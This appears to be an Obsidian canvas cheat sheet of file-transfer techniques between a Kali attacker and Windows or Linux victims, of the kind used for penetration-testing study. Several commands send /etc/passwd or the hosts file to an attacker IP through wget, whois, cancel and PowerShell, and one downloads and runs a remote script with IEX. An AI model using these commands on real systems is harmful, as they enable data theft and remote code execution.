{
	"nodes":[
		{"type":"group","id":"c2413251d995a6fc","x":-1600,"y":1000,"width":5520,"height":3880,"label":"Transfer files to ATTACKER"},
		{"type":"group","id":"4ab0e45964fd112f","x":4000,"y":1000,"width":5360,"height":3880,"color":"6","label":"Transfer files to VICTIM"},
		{"type":"group","id":"8efeb60864543ccb","x":-1420,"y":1200,"width":2540,"height":3480,"color":"1","label":"Kali Attacker "},
		{"type":"group","id":"e2f3fceea321f5e5","x":4140,"y":1470,"width":2540,"height":2940,"color":"1","label":"Kali Attacker "},
		{"id":"605f70426f903b2d","type":"group","x":-1600,"y":-840,"width":3280,"height":1720,"color":"2","label":"Base64 Transfer"},
		{"type":"group","id":"f41c157d56eb1d97","x":1400,"y":2800,"width":2320,"height":1880,"color":"5","label":"Windows Victim"},
		{"type":"group","id":"339344ca49d7b58a","x":7080,"y":2450,"width":2140,"height":1960,"color":"5","label":"Windows Victim"},
		{"type":"group","id":"4c42a929ddddf209","x":1400,"y":1200,"width":2320,"height":1480,"color":"4","label":"Linux Victim"},
		{"type":"group","id":"8d5b92211e5c21b1","x":7080,"y":1470,"width":2140,"height":910,"color":"4","label":"Linux Victim"},
		{"id":"41678a8f9a1cf267","type":"group","x":-560,"y":120,"width":759,"height":740,"color":"3","label":"cmd"},
		{"id":"91e77db329e5b035","type":"group","x":-560,"y":-460,"width":880,"height":522,"color":"4","label":"PowerShell"},
		{"id":"f1adb270fa575aa1","type":"group","x":-180,"y":-740,"width":1730,"height":144,"label":"PowerShell Base64 WebUpload"},
		{"id":"a5e9228a59c39813","type":"text","text":"Decode","x":-906,"y":-780,"width":103,"height":60},
		{"id":"9cc070d7cc5c59fd","type":"text","text":"Linux","x":-1220,"y":-697,"width":103,"height":60},
		{"id":"376c682212b309ba","type":"text","text":"Base64","x":-1560,"y":-440,"width":122,"height":60},
		{"id":"7dbb2ea9d65c288d","type":"text","text":"```bash\necho -n \"<base64>\" | base64 -d > file\n\necho -n \"<base64>\" | openssl base64 -d\n```","x":-694,"y":-810,"width":416,"height":120},
		{"id":"a7c9f154619dba0e","type":"text","text":"```bash\ncat <file> | base64 -w 0; echo\n\necho -n \"<base64>\" | openssl base64\n```","x":-692,"y":-637,"width":414,"height":120},
		{"id":"7151e2b83c48c040","type":"text","text":"Encode","x":-903,"y":-607,"width":98,"height":60},
		{"id":"a2d5f3f3eecf8a37","type":"text","text":"```powershell\n[IO.File]::WriteAllBytes(\"C:\\path\\to\\file\", [Convert]::FromBase64String(\"<base64>\"))\n```","x":-540,"y":-440,"width":831,"height":60},
		{"id":"a97400b18a77bad3","type":"text","text":"```powershell\n[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String(\"base_64\"))\n```","x":-540,"y":-260,"width":678,"height":60},
		{"id":"b9f68c10f91e33bb","type":"text","text":"```powershell\n$bytes = Get-Content <file> -Encoding Byte\n[Convert]::ToBase64String($bytes) | Set-Content <file>.b64\n```","x":-540,"y":-170,"width":560,"height":87},
		{"id":"ae9fcb9213ebf9cc","type":"text","text":"```powershell\n$b64 = Get-Content <file>.b64\n[Convert]::FromBase64String($b64) | Set-Content <file>.txt -Encoding Byte\n```","x":-540,"y":-50,"width":739,"height":92},
		{"id":"80b2e51e9873ebc0","type":"text","text":"```powershell\n[Convert]::ToBase64String((Get-Content -path \"C:\\path\\to\\file\" -Encoding byte))\n```","x":-540,"y":-350,"width":739,"height":60},
		{"id":"563e976a998e99b4","type":"text","text":"```cmd\ncertutil -decode temp.b64 decoded.txt\n```","x":-540,"y":140,"width":384,"height":60},
		{"id":"a33bb78020bf3cd8","type":"text","text":"```cmd\necho Set objXML = CreateObject(\"MSXML2.DOMDocument\") > enc.vbs\necho Set objNode = objXML.createElement(\"Base64\") >> enc.vbs\necho objNode.dataType = \"bin.base64\" >> enc.vbs\necho objNode.nodeTypedValue = CreateObject(\"ADODB.Stream\").Read() >> enc.vbs\necho WScript.StdOut.Write objNode.Text >> enc.vbs\n\ncscript //nologo enc.vbs < file.txt > file.b64\n```","x":-540,"y":340,"width":720,"height":230},
		{"id":"b1b0ad78c9eb2922","type":"text","text":"```cmd\ncertutil -encode <file> <file>.b64\n```","x":-540,"y":240,"width":493,"height":60},
		{"id":"04567ec031c1be62","type":"text","text":"```cmd\necho Set xml = CreateObject(\"MSXML2.DOMDocument\") > dec.vbs\necho Set node = xml.createElement(\"Base64\") >> dec.vbs\necho node.dataType = \"bin.base64\" >> dec.vbs\necho node.Text = WScript.StdIn.ReadAll() >> dec.vbs\necho WScript.StdOut.Write node.nodeTypedValue >> dec.vbs\n\ncscript //nologo dec.vbs < file.b64 > decoded.txt\n```","x":-540,"y":620,"width":580,"height":220},
		{"id":"b76504b5fa0bb53b","type":"text","text":"```powershell\nGet-FileHash C:\\path\\to\\file -Algorithm md5\n```","x":-1054,"y":755,"width":436,"height":60,"color":"3"},
		{"id":"b05a16ba5dce685f","type":"text","text":"Check MD5 Hash","x":-1560,"y":510,"width":183,"height":60},
		{"id":"8a6a0ea8cfb88e79","type":"text","text":"Windows","x":-1183,"y":590,"width":130,"height":60},
		{"id":"6b30a5eae32d5064","type":"text","text":"Linux","x":-1183,"y":425,"width":110,"height":60},
		{"id":"540ef394f10083a8","type":"text","text":"```bash\nmd5sum <file>\n```","x":-950,"y":425,"width":190,"height":60,"color":"3"},
		{"id":"e43a827d7c88f492","type":"text","text":"Windows","x":-1228,"y":-58,"width":120,"height":60},
		{"id":"7f92f1fa67bd3f58","type":"text","text":"Decode","x":-905,"y":-200,"width":100,"height":60,"color":"5"},
		{"id":"bc08b3e8030a4743","type":"text","text":"Encode","x":-901,"y":102,"width":98,"height":60,"color":"6"},
		{"id":"58bb15df47c0290c","type":"text","text":"```bash\nnc -lnvp 8000\necho <base64> | base64 -d -w 0 > hosts","x":1130,"y":-720,"width":400,"height":104},
		{"id":"393551d6b2b3357f","type":"text","text":"```powershell\n3.1. $b64 = [System.convert]::ToBase64String((Get-Content -Path 'C:\\Windows\\System32\\drivers\\etc\\hosts' -Encoding Byte))\n3.2. Invoke-WebRequest -Uri http://192.168.49.128:8000/ -Method POST -Body $b64\n```","x":-160,"y":-710,"width":1072,"height":84},
		{"type":"text","text":"FTP","id":"1b428995d89bac51","x":3080,"y":3250,"width":156,"height":60},
		{"type":"text","text":"TFTP","id":"f3ad80bcfe018a40","x":3080,"y":3474,"width":156,"height":60},
		{"type":"text","text":"Web","id":"e81977e44c9be781","x":3080,"y":3740,"width":156,"height":60},
		{"type":"text","text":"Netcat","id":"2beb0f379f15cf91","x":3080,"y":4000,"width":156,"height":60},
		{"type":"text","text":"Socat","id":"c69ddc1b9670e9d5","x":3080,"y":4110,"width":156,"height":60},
		{"type":"text","text":"SMB","id":"2ad3fca3d7ebf6d9","x":3080,"y":4230,"width":156,"height":60},
		{"type":"text","text":"Multiple files","id":"ceca3ee191cc6b7b","x":2057,"y":1470,"width":160,"height":60},
		{"type":"text","text":"Single file","id":"5bdd930adaab59f8","x":2057,"y":1550,"width":160,"height":60},
		{"type":"text","text":"```bash\nftp <IP-ATTACKER>\n```","id":"5f3d917251ff518b","x":2364,"y":1520,"width":258,"height":60},
		{"type":"text","text":"Web","id":"d45048da5b52c0e8","x":2960,"y":1951,"width":156,"height":60},
		{"type":"text","text":"Host a service","id":"03ef73ab057c6aa8","x":2364,"y":1660,"width":250,"height":60},
		{"type":"text","text":"Host file on VICTIM running webservice","id":"cf5e7178a6c07781","x":2404,"y":1787,"width":406,"height":60},
		{"type":"text","text":"Python","id":"1da1bf62207b73bf","x":2670,"y":1951,"width":140,"height":60},
		{"type":"text","text":"Python","id":"dda50923a07f19b6","x":2404,"y":1888,"width":125,"height":60},
		{"type":"text","text":"FTP","id":"b43cdd2457a7e306","x":2960,"y":1520,"width":156,"height":60},
		{"type":"text","text":"```cmd\nnc -nlvp 4444 < outgoing.txt\n```","id":"4f05cb4216e3f2ff","x":1640,"y":4005,"width":680,"height":50},
		{"type":"text","text":"```cmd\nsocat -u FILE:test.txt TCP:127.0.0.1:9876\n```","id":"01242ee3bd640059","x":1640,"y":4110,"width":680,"height":60},
		{"type":"text","text":"```cmd\ncopy C:\\users\\public\\music\\filename.txt \\\\0.0.0.0\\share\\filename.txt\n```","id":"5bf710169d6525f9","x":1640,"y":4234,"width":740,"height":52},
		{"type":"text","text":"Powershell - Upload","id":"5366fb544222be19","x":2897,"y":3831,"width":183,"height":60},
		{"type":"text","text":"Host file on VICTIM","id":"0e6da9744b61366c","x":2830,"y":3620,"width":250,"height":60},
		{"type":"text","text":"```powershell\n1. powershell (New-Object System.Net.WebClient).UploadFile('http://10.11.0.4/upload.php', 'important.docx')\n2.1. IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/juliourena/plaintext/master/Powershell/PSUpload.ps1')\n2.2. Invoke-FileUpload -Uri http://192.168.49.128:8000/upload -File C:\\Windows\\System32\\drivers\\etc\\hosts\n```","id":"1dd46bc058c62b3c","x":1640,"y":3806,"width":1220,"height":110},
		{"type":"text","text":"```bash\nscp local_file.txt USER@ATTACKER-IP:/tmp/remote_file.txt\n```","id":"4eeb888b123623cf","x":1604,"y":1340,"width":854,"height":60},
		{"type":"text","text":"```bash\nmput <FILE-*>\n```","id":"f54f7348f66ffc4e","x":1604,"y":1470,"width":280,"height":60},
		{"type":"text","text":"```bash\nput <FILE-NAME>\n```","id":"3076e110475c68ec","x":1604,"y":1550,"width":280,"height":60},
		{"type":"text","text":"Copy file to root of FTP service","id":"72949c86b6c72209","x":1604,"y":1659,"width":474,"height":61},
		{"type":"text","text":"```bash\nsudo systemctl start ssh\n```","id":"98870cc09701b962","x":1849,"y":1240,"width":609,"height":60},
		{"type":"text","text":"\n```bash\nruby -run -e httpd . -p 9000\n```","id":"b13418b4cc74fb85","x":2085,"y":2086,"width":441,"height":58},
		{"type":"text","text":"Copy file to root of webservice","id":"287373da86ddd7bd","x":1864,"y":1787,"width":442,"height":61},
		{"type":"text","text":"\n```bash\nsudo python -m SimpleHTTPServer 8080\n```\n","id":"8dd532d66174f834","x":1864,"y":1890,"width":441,"height":58},
		{"type":"text","text":"\n```bash\nsudo python3 -m http.server 8080\n```\n","id":"8c2a93016be5b298","x":1864,"y":1981,"width":441,"height":58},
		{"type":"text","text":"```bash\nrdesktop $ip -u <username> -p <password> -r disk:tmp=$(pwd)\n```","id":"c30a20baf7474793","x":-274,"y":4035,"width":722,"height":60},
		{"type":"text","text":"```bash\nxfreerdp /v:$ip /u:<username> /p:<password> /dynamic-resolution +clipboard /drive:share,/home/kali/project\n```","id":"4059fd2f11279a8b","x":-274,"y":4155,"width":1091,"height":60},
		{"type":"text","text":"```bash\ndownload filename.txt /home/kali/projects/filename.txt\n```","id":"93849ad34b5459f2","x":18,"y":4313,"width":659,"height":60},
		{"type":"text","text":"```bash\nevil-winrm\n```","id":"732d7c2c11f71f65","x":-462,"y":4313,"width":419,"height":60},
		{"type":"text","text":"rdesktop","id":"0581355edea7e0eb","x":-512,"y":4035,"width":140,"height":60},
		{"type":"text","text":"xfreerdp","id":"2ecea737e06d4576","x":-511,"y":4155,"width":140,"height":60},
		{"type":"text","text":"Hosting  a upload service","id":"de583cf5c784e101","x":-540,"y":3082,"width":277,"height":64},
		{"type":"text","text":"PHP","id":"77071a338b4ae4d0","x":-171,"y":3084,"width":140,"height":60},
		{"type":"text","text":"netcat","id":"e5712d4396ae46c0","x":-882,"y":3625,"width":250,"height":60},
		{"type":"text","text":"Downloading","id":"a77417db335770b4","x":-540,"y":2704,"width":277,"height":60},
		{"type":"text","text":"Download file(s)","id":"35f4a7cf15b3565e","x":-1360,"y":2791,"width":160,"height":60},
		{"type":"text","text":"Web","id":"a5657be0052b21b4","x":-882,"y":2794,"width":162,"height":60},
		{"type":"text","text":"Downloading","id":"59570f94b9250d2e","x":-540,"y":1953,"width":277,"height":60},
		{"type":"text","text":"Hosting  a upload service","id":"519fb02a7d927135","x":-540,"y":2223,"width":277,"height":60},
		{"type":"text","text":"```bash\naxel -a -n 20 -o filename.pdf http://www.domain.tld/directory/large-file.pdf\n```","id":"d6d94240af95f1fa","x":-154,"y":2616,"width":831,"height":60},
		{"type":"text","text":"```bash \nsudo atftpd --daemon --port 69 /tftp\n```","id":"81e94ba50e067092","x":-160,"y":2463,"width":489,"height":60},
		{"type":"text","text":"pure FTP","id":"2bd6bbbe250c523b","x":-106,"y":2134,"width":140,"height":60},
		{"type":"text","text":"VSFTPD","id":"e027d50cd519e8b9","x":-106,"y":2223,"width":140,"height":60},
		{"type":"text","text":"Python","id":"16a8d9f4d6ce0925","x":-106,"y":2321,"width":140,"height":60},
		{"type":"text","text":"TFTP","id":"0df34b2ce7779a14","x":-888,"y":2463,"width":162,"height":60},
		{"type":"text","text":"FTP","id":"e7518bfe4e3d2a04","x":-888,"y":2043,"width":162,"height":60},
		{"type":"text","text":"SSH","id":"de812d21785b5051","x":-888,"y":1803,"width":162,"height":60},
		{"type":"text","text":"SCP","id":"d19eaf65d255b3e9","x":-888,"y":1663,"width":150,"height":60},
		{"type":"text","text":"```bash\nget <FILE-NAME>\n```","id":"eb173489af0c76d1","x":462,"y":1953,"width":280,"height":60},
		{"type":"text","text":"```bash\nmget <FILE-*>\n```","id":"61a872e658dfe5c0","x":462,"y":2043,"width":280,"height":60},
		{"type":"text","text":"","id":"0887979d73fc6e82","x":974,"y":1803,"width":60,"height":60,"color":"#ff00bb"},
		{"type":"text","text":"","id":"1f0cc683a5d4144e","x":974,"y":1953,"width":60,"height":446,"color":"#813dff"},
		{"type":"text","text":"```bash\npython SimpleHTTPServerWithUpload.py\n```","id":"3617fc4e04469b66","x":96,"y":3234,"width":656,"height":60},
		{"type":"text","text":"```bash\nsudo php -S 0.0.0.0:80\n```","id":"7cc43aa399754661","x":216,"y":3084,"width":367,"height":60},
		{"type":"text","text":"","id":"943c0a1d0316a739","x":974,"y":3540,"width":60,"height":145,"color":"2"},
		{"id":"c9e29c6718cf6207","type":"text","text":"```bash\npython3 -m uploadserver\n```","x":457,"y":3440,"width":295,"height":60},
		{"id":"daa3bf01bee80b60","type":"text","text":"```bash\npip3 install uploadserver\n```","x":96,"y":3440,"width":295,"height":60},
		{"id":"35463c1471f7d024","type":"text","text":"```bash\nsudo python -m pyftpdlib 21\n```","x":96,"y":3334,"width":656,"height":60},
		{"type":"text","text":"```bash\nsudo systemctl start ssh\n```","id":"020fb08309842c83","x":-147,"y":1803,"width":609,"height":60},
		{"type":"text","text":"```bash\nftp <IP-ATTACKER>\n```","id":"abe18e07d0219c92","x":-89,"y":1953,"width":258,"height":60},
		{"type":"text","text":"Single file","id":"52c73efa9250685c","x":256,"y":1953,"width":160,"height":60},
		{"type":"text","text":"Multiple files","id":"310fc0d025eaa781","x":256,"y":2043,"width":160,"height":60},
		{"type":"text","text":"```bash\nscp user@VICTIM-IP:/path/to/remotefile.sh /Local/Target/Detination\n```","id":"0b103e4040e84c63","x":-148,"y":1663,"width":854,"height":60},
		{"type":"text","text":"```php\n<?php\n$uploaddir = '/var/www/uploads/';\n$uploadfile = $uploaddir . $_FILES['file']['name'];\nmove_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)\n?>\n```","id":"d54377d7edd089e0","x":46,"y":2882,"width":706,"height":155},
		{"type":"text","text":"```bash\nsudo python3 -m python_ftp_server -d \"</home/kali/project/upload-directory\" -u \"user\" -p \"password\" --ip <IP-ATTACKER> --port 21\n```","id":"17b0029c99e27636","x":72,"y":2303,"width":780,"height":96},
		{"type":"text","text":"\n```bash\nsystemctl start pure-ftpd\n```\n","id":"c8cd070b275877d0","x":72,"y":2134,"width":609,"height":60},
		{"type":"text","text":"```bash\nsudo service vsftpd start\n```","id":"04b04eb552ce441d","x":72,"y":2223,"width":609,"height":60},
		{"type":"text","text":"```bash\nwget http://<IP-ATTACKER>/<FILE> \n```","id":"80d99aedeb039daa","x":-154,"y":2704,"width":493,"height":60},
		{"type":"text","text":"```bash\ncurl http://<IP-ATTACKER>/<FILE> -o <file>\n```","id":"59170f3ea19b642f","x":-154,"y":2791,"width":493,"height":60},
		{"type":"text","text":"```cmd\nopen <IP-ATTACKER> \n<USERNAME>\n<PASSWORD>\nbinary\nput file.exe\ndisconnect\nquit\n```","id":"0a7dd691df937c39","x":2040,"y":2860,"width":250,"height":260},
		{"type":"text","text":"```cmd\nftp -i -s:ftp.txt\n```","id":"81751f83cae24cbb","x":1770,"y":2960,"width":250,"height":60},
		{"type":"text","text":"```bash\nmput <FILE-*>\n```","id":"9e67a4eb98d2ac33","x":1740,"y":3139,"width":280,"height":60},
		{"type":"text","text":"```bash\nput <FILE-NAME>\n```","id":"669a918965c11e35","x":1740,"y":3248,"width":280,"height":60},
		{"type":"text","text":"","id":"319bed429aa52a55","x":1440,"y":3139,"width":60,"height":60,"color":"#813dff"},
		{"type":"text","text":"wget","id":"59359e3a5c3d4535","x":2960,"y":2260,"width":156,"height":50},
		{"type":"text","text":"whois","id":"5802a5970cdb4414","x":2962,"y":2336,"width":156,"height":50},
		{"type":"text","text":"netcat","id":"41096355fc79982d","x":2962,"y":2500,"width":156,"height":50},
		{"type":"text","text":"Socat","id":"e6080f5fcb0e0aa1","x":2962,"y":2580,"width":156,"height":50},
		{"type":"text","text":"cancel","id":"71895cd69bc8c284","x":2962,"y":2413,"width":156,"height":50},
		{"type":"text","text":"Ruby","id":"1423974a6d1ba0d1","x":2670,"y":2142,"width":140,"height":60},
		{"type":"text","text":"```bash\nwget --post-file=/etc/passwd <IP-ATTACKER:1234>\n```","id":"d23beb5101c5b310","x":2129,"y":2260,"width":489,"height":50},
		{"type":"text","text":"```bash\nwhois -h <IP-ATTACKER> - p<1234> `cat /etc/passwd`\n```","id":"ddee697d53d248fa","x":2129,"y":2336,"width":489,"height":50},
		{"type":"text","text":"```bash\ncancel -u \"$(cat /etc/passwd)\" -h  <IP-ATTACKER:1234>\n```","id":"b26f0d06c675a891","x":2129,"y":2414,"width":489,"height":50},
		{"type":"text","text":"```bash\nnc -nlvp 4444 < outgoing.txt\n```","id":"17dcfbccec1e4758","x":2129,"y":2500,"width":493,"height":50},
		{"type":"text","text":"```bash\nsocat -u FILE:test.txt TCP:127.0.0.1:9876\n```","id":"2ff0f3e439b8dd09","x":2137,"y":2580,"width":493,"height":60},
		{"type":"text","text":"Single file","id":"7c31c9ead21cc3be","x":2434,"y":3248,"width":160,"height":60},
		{"type":"text","text":"```bash\nftp <IP-ATTACKER>\n```","id":"c74e4313eb6bdacf","x":2694,"y":3248,"width":258,"height":60},
		{"type":"text","text":"Upload file(s)","id":"6f7a5c655bd1b965","x":3400,"y":3820,"width":220,"height":60},
		{"type":"text","text":"SSH","id":"c3fc32194eed48db","x":2960,"y":1240,"width":156,"height":60},
		{"type":"text","text":"SCP","id":"162af4fbd5ef72dd","x":2960,"y":1340,"width":156,"height":60},
		{"type":"text","text":"Upload file(s)","id":"ec15a9d60e148a70","x":3400,"y":1880,"width":220,"height":60},
		{"type":"text","text":"Python3","id":"94a0e4970e720140","x":2404,"y":1981,"width":125,"height":60},
		{"type":"text","text":"Multiple files","id":"3eaa0c2c8318667c","x":2434,"y":3139,"width":160,"height":60},
		{"type":"text","text":"Copy file to root of webservice","id":"66a989b2ce7955a1","x":2053,"y":3619,"width":474,"height":61},
		{"type":"text","text":"```cmd\ntftp -i <IP-ATTACKER> put <FILENAME>\n```","id":"7e49eb10ca6f5757","x":2430,"y":3474,"width":522,"height":60},
		{"type":"text","text":"","id":"206d8a6ac4824b5e","x":1440,"y":4230,"width":60,"height":60,"color":"#00ccff"},
		{"type":"text","text":"","id":"04b72fc063be29c4","x":1440,"y":4350,"width":60,"height":60,"color":"#e100ff"},
		{"type":"text","text":"","id":"053e7e8f3c315c09","x":1440,"y":4430,"width":60,"height":60,"color":"3"},
		{"type":"text","text":"winRM","id":"664adbb7ea9bdbbc","x":3080,"y":4437,"width":156,"height":60},
		{"type":"text","text":"Just copy via the GUI","id":"e654e7d64ef63509","x":2080,"y":4350,"width":240,"height":60},
		{"type":"text","text":"RDP","id":"87cbabd65a20471d","x":3080,"y":4350,"width":156,"height":60},
		{"type":"text","text":"","id":"11707e48c1e1a141","x":1440,"y":3811,"width":60,"height":100,"color":"#f0ff24"},
		{"type":"text","text":"","id":"da3be8f1fa1efbaa","x":1440,"y":4000,"width":60,"height":60,"color":"2"},
		{"type":"text","text":"","id":"321f3a413498b2ce","x":1440,"y":4110,"width":60,"height":60,"color":"4"},
		{"type":"text","text":"","id":"9064238ac18087ba","x":1440,"y":3474,"width":60,"height":60,"color":"#3dfffc"},
		{"type":"text","text":"","id":"a84cf981923b7f68","x":1440,"y":3619,"width":60,"height":61,"color":"#d8be13"},
		{"type":"text","text":"Socat","id":"bb61437274480bce","x":-882,"y":3745,"width":250,"height":60},
		{"type":"text","text":"SMB","id":"b597428b8f16e360","x":-882,"y":3885,"width":250,"height":60},
		{"type":"text","text":"RDP","id":"dbaaa78274848b06","x":-882,"y":4095,"width":250,"height":60},
		{"type":"text","text":"Evil-winRM","id":"27670e51f3e77954","x":-882,"y":4313,"width":250,"height":60},
		{"type":"text","text":"impacket","id":"7182ca8d7591ad6f","x":-511,"y":3885,"width":140,"height":60},
		{"type":"text","text":"```bash\nsocat -u TCP-LISTEN:9876,reuseaddr OPEN:out.txt,creat && cat out.txt\n```","id":"bb057ca10ad0dd92","x":-274,"y":3745,"width":722,"height":60},
		{"type":"text","text":"```bash\nsudo impacket-smbserver share $(pwd) -smb2support test\n```","id":"41ba20af7431563f","x":-274,"y":3885,"width":700,"height":60},
		{"type":"text","text":"","id":"e77cabc74a6b8e6b","x":974,"y":1663,"width":60,"height":60,"color":"#009e1a"},
		{"type":"text","text":"","id":"8209634c9d537ed4","x":974,"y":2463,"width":60,"height":60,"color":"#3dfffc"},
		{"type":"text","text":"","id":"7dd0c1a9782a1259","x":974,"y":2613,"width":60,"height":238,"color":"#d8be13"},
		{"type":"text","text":"","id":"971ac7a48bc9d48a","x":974,"y":2882,"width":60,"height":452,"color":"#f0ff24"},
		{"type":"text","text":"","id":"9fc36171dc101cae","x":974,"y":3745,"width":60,"height":60,"color":"4"},
		{"type":"text","text":"","id":"14f23e71f8aef871","x":974,"y":4030,"width":60,"height":185,"color":"#e100ff"},
		{"type":"text","text":"","id":"1ca60381a66b2f39","x":974,"y":4313,"width":60,"height":60,"color":"3"},
		{"type":"text","text":"","id":"99bfa859aa5eaaf0","x":974,"y":3881,"width":60,"height":60,"color":"#00ccff"},
		{"type":"text","text":"","id":"f26fedc63ca81598","x":1430,"y":1240,"width":60,"height":60,"color":"#009e1a"},
		{"type":"text","text":"","id":"f0f11e4dd6631dc6","x":1430,"y":1340,"width":60,"height":60,"color":"#ff00bb"},
		{"type":"text","text":"","id":"1bf9e55a732d0cd2","x":1430,"y":1470,"width":60,"height":250,"color":"#813dff"},
		{"type":"text","text":"","id":"ade906f9fa3719d4","x":1430,"y":1787,"width":60,"height":444,"color":"#d8be13"},
		{"type":"text","text":"\n```bash\nruby -rwebrick -e \"WEBrick::HTTPServer.new(:Port => 8080, :DocumentRoot => Dir.pwd).start\"\n```\n","id":"9874eb1622fe61eb","x":1604,"y":2173,"width":922,"height":58},
		{"type":"text","text":"","id":"b92ed687ac196517","x":1432,"y":2260,"width":60,"height":290,"color":"2"},
		{"type":"text","text":"","id":"c13ccadb8997ef05","x":1432,"y":2580,"width":60,"height":60,"color":"4"},
		{"type":"text","text":"Python","id":"4f0282692097be94","x":-171,"y":3234,"width":140,"height":60},
		{"type":"text","text":"```bash\nnc -nlvp 1234\n```","id":"7a348eb82fc2e891","x":-274,"y":3540,"width":837,"height":50},
		{"type":"text","text":"```bash\nnc -nv 10.11.0.22 4444 > /home/kali/project/outgoing.txt\n```","id":"76744c6f93744040","x":-274,"y":3630,"width":837,"height":50},
		{"id":"73331fa21e9b88e4","type":"text","text":"WebDav","x":-882,"y":4540,"width":250,"height":60},
		{"id":"641b86993685cfc6","type":"text","text":"```bash\nsudo pip3 install wsgidav cheroo\nsudo wsgidav --host=0.0.0.0 --port=80 --root=/tmp --auth=anonymous\n```","x":-462,"y":4519,"width":638,"height":102},
		{"type":"text","text":"","id":"86a66e604fa499f3","x":974,"y":4540,"width":60,"height":60,"color":"5"},
		{"type":"text","text":"```bash\nrdesktop $ip -u <username> -p <password> -r disk:tmp=$(pwd)\n```","id":"1611cb26509cc566","x":5380,"y":3490,"width":722,"height":60},
		{"type":"text","text":"","id":"15751a7c47c279a0","x":6560,"y":3490,"width":60,"height":180,"color":"#e100ff"},
		{"id":"6b74dce4be452663","type":"text","text":"```bash\nxfreerdp /v:$ip /u:<username> /p:<password> /dynamic-resolution +clipboard /drive:share,/home/kali/project\n```","x":5380,"y":3610,"width":1091,"height":60},
		{"type":"text","text":"```bash\nevil-winrm\n```","id":"ac6fe415aa607f66","x":5212,"y":3780,"width":419,"height":60},
		{"type":"text","text":"```bash\nupload filename.exe\n```","id":"3da401f07cffb60c","x":5702,"y":3780,"width":250,"height":60},
		{"type":"text","text":"","id":"abdc29d36545b130","x":6561,"y":3780,"width":60,"height":60,"color":"3"},
		{"type":"text","text":"SMB","id":"6570b2cd1aad3de5","x":4791,"y":3350,"width":250,"height":60},
		{"type":"text","text":"rdesktop","id":"7b577de4fedd4632","x":5142,"y":3490,"width":140,"height":60},
		{"type":"text","text":"RDP","id":"616fa7abc65cca82","x":4791,"y":3550,"width":250,"height":60},
		{"type":"text","text":"xfreerdp","id":"e7c9391d1588b420","x":5143,"y":3610,"width":140,"height":60},
		{"type":"text","text":"Evil-winRM","id":"c5f5bd20928242f0","x":4791,"y":3780,"width":250,"height":60},
		{"type":"text","text":"```bash\nnc -nv 10.11.0.22 4444 < /usr/share/windows-resources/binaries/wget.exe\n```","id":"c312e0abec42c216","x":5211,"y":3095,"width":837,"height":50},
		{"type":"text","text":"```bash\nsudo socat TCP4-LISTEN:443,fork file:<FILE-NAME>\n```","id":"628b7cda3c9f3c36","x":5211,"y":3210,"width":722,"height":60},
		{"type":"text","text":"","id":"b168481adcaf3636","x":6560,"y":3210,"width":60,"height":60,"color":"4"},
		{"type":"text","text":"impacket","id":"e809d59898209591","x":5211,"y":3350,"width":140,"height":60},
		{"type":"text","text":"Python","id":"62f94536accd6287","x":5200,"y":2551,"width":140,"height":60},
		{"type":"text","text":"PHP","id":"d42c329b66d409a1","x":5200,"y":2680,"width":140,"height":60},
		{"type":"text","text":"Apache","id":"41960b78fab0ec44","x":5200,"y":2760,"width":140,"height":60},
		{"type":"text","text":"Ruby","id":"4f0f6aac24ecf50d","x":5200,"y":2890,"width":140,"height":60},
		{"type":"text","text":"```bash\nsudo php -S 0.0.0.0:80\n```","id":"5fd703781b2d93ab","x":5438,"y":2680,"width":367,"height":60},
		{"type":"text","text":"```bash\nftp <IP-ATTACKER>\n```","id":"324b0da3bef5b4f2","x":8040,"y":1790,"width":258,"height":60},
		{"type":"text","text":"SSH","id":"e6be156740fe8e12","x":8376,"y":1510,"width":156,"height":60},
		{"type":"text","text":"SCP","id":"3fecb1ebe42c8731","x":8376,"y":1610,"width":156,"height":60},
		{"type":"text","text":"FTP","id":"13e41a9f4fc73b2c","x":8376,"y":1790,"width":156,"height":60},
		{"type":"text","text":"```bash\nwget http://<IP-ATTACKER>/<FILE> \n```","id":"9b55fe84d7f929ae","x":7805,"y":2050,"width":493,"height":60},
		{"type":"text","text":"```bash\nnc -nlvp 4444 > incoming.sh\n```","id":"3fe6b559ee33e053","x":7805,"y":2150,"width":493,"height":50},
		{"type":"text","text":"Web","id":"adc2752bec8be250","x":8376,"y":2003,"width":156,"height":60},
		{"type":"text","text":"netcat","id":"0c90b23510c282cb","x":8376,"y":2150,"width":156,"height":50},
		{"type":"text","text":"```bash\nget <FILE-NAME>\n```","id":"7ce1d35abaf50b9d","x":7280,"y":1820,"width":280,"height":60},
		{"type":"text","text":"Multiple files","id":"95abd2a32999bab8","x":7733,"y":1740,"width":160,"height":60},
		{"type":"text","text":"Single file","id":"2ecf93de91d05844","x":7733,"y":1820,"width":160,"height":60},
		{"type":"text","text":"```bash\ncurl http://<IP-ATTACKER>/<FILE> -o <file>\n```","id":"8e05bf4e3b200b42","x":7805,"y":1953,"width":493,"height":60},
		{"type":"text","text":"```bash\nmget <FILE-*>\n```","id":"d7ea99611c53f233","x":7280,"y":1740,"width":280,"height":60},
		{"type":"text","text":"","id":"a32d3fd204ae2b3c","x":7110,"y":1610,"width":60,"height":60,"color":"#ff00bb"},
		{"type":"text","text":"","id":"e990bc9697fe9e5e","x":7110,"y":1955,"width":60,"height":155,"color":"#d8be13"},
		{"type":"text","text":"","id":"dac2251fa56939f6","x":7110,"y":2140,"width":60,"height":60,"color":"2"},
		{"type":"text","text":"```bash\nscp user@ATTACKER-IP:/path/to/remotefile.sh /Local/Target/Detination\n```","id":"b0c2b27bcb205003","x":7280,"y":1610,"width":854,"height":60},
		{"type":"text","text":"```bash\nsudo systemctl start ssh\n```","id":"c0729f5bb50a8a7b","x":7525,"y":1510,"width":609,"height":60},
		{"type":"text","text":"Download file(s)","id":"dd5697b10c676920","x":8770,"y":1790,"width":220,"height":60},
		{"type":"text","text":"","id":"a95530a364c21e64","x":7110,"y":1790,"width":60,"height":60,"color":"#813dff"},
		{"type":"text","text":"","id":"66af2b4deed72708","x":7140,"y":3870,"width":60,"height":60,"color":"2"},
		{"type":"text","text":"","id":"8ab4b0fbd5376ba8","x":7140,"y":3980,"width":60,"height":60,"color":"4"},
		{"type":"text","text":"","id":"63fb32c734c55b2b","x":7140,"y":4100,"width":60,"height":60,"color":"#00ccff"},
		{"type":"text","text":"","id":"43038080c798fd25","x":7140,"y":4220,"width":60,"height":60,"color":"#e100ff"},
